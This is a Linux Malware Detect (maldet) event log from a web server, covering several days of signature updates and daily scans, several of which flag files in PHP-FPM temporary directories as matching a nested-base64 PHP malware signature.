Jan 02 2026 04:31:58 web1 maldet(202327): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 02 2026 04:31:59 web1 maldet(202327): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 02 2026 04:31:59 web1 maldet(202327): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 02 2026 04:31:59 web1 maldet(202327): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 02 2026 04:31:59 web1 maldet(202327): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 02 2026 04:32:30 web1 maldet(202327): {scan} file list completed in 31s, found 1668 files...
Jan 02 2026 04:32:30 web1 maldet(202327): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 02 2026 04:32:30 web1 maldet(202327): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1668 files) in progress...
Jan 02 2026 04:33:03 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_695651253b940.php
Jan 02 2026 04:33:03 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956518a70e66.php
Jan 02 2026 04:33:03 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b194ec8fd.php
Jan 02 2026 04:33:03 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b20c92abc.php
Jan 02 2026 04:33:03 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b284adf51.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956af7b0fd0f.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b4285f57a.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69564fe60ba25.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69564f75a0b8f.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b3bf7a06c.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_695651253b940.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956518a70e66.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b194ec8fd.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b20c92abc.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b284adf51.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956af7b0fd0f.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b4285f57a.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69564fe60ba25.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69564f75a0b8f.php
Jan 02 2026 04:33:04 web1 maldet(202327): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6956b3bf7a06c.php
Jan 02 2026 04:33:04 web1 maldet(202327): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1668, malware hits 20, cleaned hits 0, time 66s
Jan 02 2026 04:33:04 web1 maldet(202327): {scan} scan report saved, to view run: maldet --report 260102-0431.202327
Jan 02 2026 04:33:04 web1 maldet(202327): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260102-0431.202327
Jan 02 2026 10:02:49 web1 maldet(1195): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 02 2026 19:03:19 web1 maldet(1170): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 03 2026 02:35:47 web1 maldet(1194): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 03 2026 03:54:28 web1 maldet(32125): {update} checking for available updates...
Jan 03 2026 03:54:28 web1 maldet(32125): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 03 2026 03:54:28 web1 maldet(32125): {update} hashing install files and checking against server...
Jan 03 2026 03:54:28 web1 maldet(32125): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 03 2026 03:54:28 web1 maldet(32125): {update} latest version already installed.
Jan 03 2026 03:54:28 web1 maldet(32234): {sigup} performing signature update check...
Jan 03 2026 03:54:28 web1 maldet(32234): {sigup} local signature set is version 202601012945490
Jan 03 2026 03:54:28 web1 maldet(32234): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 03 2026 03:54:28 web1 maldet(32234): {sigup} latest signature set already installed
Jan 03 2026 03:54:28 web1 maldet(32324): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 03 2026 03:54:29 web1 maldet(32324): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 03 2026 03:54:29 web1 maldet(32324): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 03 2026 03:54:29 web1 maldet(32324): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 03 2026 03:54:29 web1 maldet(32324): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 03 2026 03:55:01 web1 maldet(32324): {scan} file list completed in 32s, found 1035 files...
Jan 03 2026 03:55:01 web1 maldet(32324): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 03 2026 03:55:01 web1 maldet(32324): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1035 files) in progress...
Jan 03 2026 03:55:29 web1 maldet(32324): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-541e8b9edc624b7ba0f54da780cda779-ea-php83-php-fpm.service-DB7clk/tmp/run_6957c75bb01df.php
Jan 03 2026 03:55:29 web1 maldet(32324): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-4807e228851e4f11ae4c3bd6d8db512e-ea-php83-php-fpm.service-RQCTWg/tmp/run_6958712fa15c3.php
Jan 03 2026 03:55:29 web1 maldet(32324): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-541e8b9edc624b7ba0f54da780cda779-ea-php83-php-fpm.service-DB7clk/tmp/run_6957c75bb01df.php
Jan 03 2026 03:55:29 web1 maldet(32324): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-4807e228851e4f11ae4c3bd6d8db512e-ea-php83-php-fpm.service-RQCTWg/tmp/run_6958712fa15c3.php
Jan 03 2026 03:55:29 web1 maldet(32324): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1035, malware hits 4, cleaned hits 0, time 61s
Jan 03 2026 03:55:29 web1 maldet(32324): {scan} scan report saved, to view run: maldet --report 260103-0354.32324
Jan 03 2026 03:55:29 web1 maldet(32324): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260103-0354.32324
Jan 03 2026 14:05:40 web1 maldet(1168): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 04 2026 02:36:37 web1 maldet(1159): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 04 2026 04:44:59 web1 maldet(44182): {update} checking for available updates...
Jan 04 2026 04:44:59 web1 maldet(44182): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 04 2026 04:44:59 web1 maldet(44182): {update} hashing install files and checking against server...
Jan 04 2026 04:44:59 web1 maldet(44182): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 04 2026 04:44:59 web1 maldet(44182): {update} latest version already installed.
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} performing signature update check...
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} local signature set is version 202601012945490
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} new signature set 202601043906265 available
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 04 2026 04:45:00 web1 maldet(44293): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 04 2026 04:45:01 web1 maldet(44293): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 04 2026 04:45:01 web1 maldet(44293): {sigup} verified md5sum of maldet-clean.tgz
Jan 04 2026 04:45:01 web1 maldet(44293): {sigup} unpacked and installed maldet-clean.tgz
Jan 04 2026 04:45:01 web1 maldet(44293): {sigup} signature set update completed
Jan 04 2026 04:45:01 web1 maldet(44293): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 04 2026 04:45:01 web1 maldet(44508): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 04 2026 04:45:02 web1 maldet(44508): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 04 2026 04:45:02 web1 maldet(44508): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 04 2026 04:45:02 web1 maldet(44508): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 04 2026 04:45:02 web1 maldet(44508): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 04 2026 04:45:37 web1 maldet(44508): {scan} file list completed in 35s, found 1162 files...
Jan 04 2026 04:45:37 web1 maldet(44508): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 04 2026 04:45:37 web1 maldet(44508): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1162 files) in progress...
Jan 04 2026 04:46:07 web1 maldet(44508): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1162, malware hits 0, cleaned hits 0, time 66s
Jan 04 2026 04:46:07 web1 maldet(44508): {scan} scan report saved, to view run: maldet --report 260104-0445.44508
Jan 04 2026 15:40:42 web1 maldet(1159): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 05 2026 04:26:13 web1 maldet(225984): {update} checking for available updates...
Jan 05 2026 04:26:13 web1 maldet(225984): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 05 2026 04:26:13 web1 maldet(225984): {update} hashing install files and checking against server...
Jan 05 2026 04:26:13 web1 maldet(225984): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 05 2026 04:26:13 web1 maldet(225984): {update} latest version already installed.
Jan 05 2026 04:26:13 web1 maldet(226096): {sigup} performing signature update check...
Jan 05 2026 04:26:13 web1 maldet(226096): {sigup} local signature set is version 202601043906265
Jan 05 2026 04:26:14 web1 maldet(226096): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 05 2026 04:26:14 web1 maldet(226096): {sigup} latest signature set already installed
Jan 05 2026 04:26:14 web1 maldet(226189): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 05 2026 04:26:14 web1 maldet(226189): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 05 2026 04:26:14 web1 maldet(226189): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 05 2026 04:26:14 web1 maldet(226189): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 05 2026 04:26:14 web1 maldet(226189): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 05 2026 04:26:43 web1 maldet(226189): {scan} file list completed in 29s, found 6114 files...
Jan 05 2026 04:26:43 web1 maldet(226189): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 05 2026 04:26:43 web1 maldet(226189): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6114 files) in progress...
Jan 05 2026 04:27:18 web1 maldet(226189): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6114, malware hits 0, cleaned hits 0, time 64s
Jan 05 2026 04:27:18 web1 maldet(226189): {scan} scan report saved, to view run: maldet --report 260105-0426.226189
Jan 06 2026 04:00:56 web1 maldet(656848): {update} checking for available updates...
Jan 06 2026 04:00:57 web1 maldet(656848): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 06 2026 04:00:57 web1 maldet(656848): {update} hashing install files and checking against server...
Jan 06 2026 04:00:57 web1 maldet(656848): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 06 2026 04:00:57 web1 maldet(656848): {update} latest version already installed.
Jan 06 2026 04:00:57 web1 maldet(656959): {sigup} performing signature update check...
Jan 06 2026 04:00:57 web1 maldet(656959): {sigup} local signature set is version 202601043906265
Jan 06 2026 04:00:57 web1 maldet(656959): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 06 2026 04:00:57 web1 maldet(656959): {sigup} latest signature set already installed
Jan 06 2026 04:00:57 web1 maldet(657057): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 06 2026 04:00:57 web1 maldet(657057): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 06 2026 04:00:57 web1 maldet(657057): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 06 2026 04:00:57 web1 maldet(657057): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 06 2026 04:00:57 web1 maldet(657057): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 06 2026 04:01:32 web1 maldet(657057): {scan} file list completed in 35s, found 966 files...
Jan 06 2026 04:01:32 web1 maldet(657057): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 06 2026 04:01:32 web1 maldet(657057): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (966 files) in progress...
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccf1d07a43.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cced286b2c.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c58b4d8ef5.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cadb141bf9.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccf0aa9f56.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c581649d38.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c87e09d207.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cb0c110290.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cad779c12c.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5acfe9a1a.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cce6a92e38.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0f20bd11.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8a27b8360.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695ccee5760cd.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c89dbc9442.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8d0e51fde.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cad93ee58b.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8bd149145.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5b11b9a77.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caeadd34d3.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf3039572.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5b539d591.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd092b96a3.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c5b917ca6a.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae5d88832.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8b8d2b9c7.php
Jan 06 2026 04:01:58 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf1591526.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8d2c26f91.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0fcc0941.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695caf97278df.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae92cb425.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cb0962a6a5.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0a3582df.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695c8d429fe7a.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cb0ad0299a.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cae41cd677.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cce5512e3f.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0694c8f7.php
Jan 06 2026 04:01:59 web1 maldet(657057): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-f79eee48edb8417fb0d3a655395d44d7-ea-php83-php-fpm.service-f2Aa6m/tmp/run_695cd0b29f89a.php
